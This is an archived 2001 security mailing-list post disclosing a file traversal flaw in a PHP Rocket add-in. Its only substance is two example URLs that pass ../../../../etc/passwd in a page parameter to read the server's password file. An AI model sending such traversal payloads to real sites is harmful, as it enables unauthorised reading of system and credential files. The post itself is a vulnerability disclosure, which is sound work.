PHP Rocket Add-in (file transversal vulnerability)

From: John Doe (zalethat_private)
Date: Fri Dec 28 2001 - 14:39:36 PST

  • Next message: Peter W: "Re: Vim backup Source Disclosure Vulnerability"

    
     ('binary' encoding is not supported, stored as-is)
    Hi
    
    Just found a file transversal vulnerability in php 
    rocket add-in.
    
    I won't ramble but heres what you do:
    http://www.someuser.com/phprocketaddin/?
    page=../../../../etc/passwd
    http://www.someuser.com/index.php?
    page=../../../../etc/passwd
    
    Cheers
    
    Zaleth
    



    This archive was generated by hypermail 2b30 : Fri Dec 28 2001 - 14:53:14 PST